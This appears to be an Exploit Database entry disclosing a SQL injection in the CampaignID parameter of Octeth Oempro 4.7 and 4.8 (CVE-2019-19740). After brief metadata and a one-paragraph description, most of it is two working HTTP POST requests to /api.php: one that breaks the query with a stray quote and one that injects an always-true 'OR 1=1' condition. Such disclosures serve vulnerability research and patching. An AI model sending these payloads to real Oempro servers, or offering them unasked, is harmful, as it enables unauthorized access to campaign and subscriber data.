EXPLOITS

Octeth Oempro 4.8 - 'CampaignID' SQL Injection

Author: Bruno de Barros Bulle
type: webapps
platform: php
port: 80.0
date_added: 2020-01-28  
date_updated: 2020-01-28  
verified: 0  
codes: CVE-2019-19740  
tags: SQL Injection (SQLi)  
aliases:   
screenshot_url:   
application_url:   

raw file: 47967.txt  

# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection
# Date: 2020-01-27
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
# Vendor Homepage: www2.octeth.com
# Version: Octeth Oempro v.4.7 and v.4.8
# Tested on: Oempro v.4.7
# CVE : CVE-2019-19740


An authenticated user can easily exploit this vulnerability. Octeth Oempro
4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get
is vulnerable.

# Error condition
POST /api.php HTTP/1.1
Host: 127.0.0.1

command=Campaign.Get&CampaignID=2019'&responseformat=JSON

# SQL Injection exploitation
POST /api.php HTTP/1.1
Host: 127.0.0.1

command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON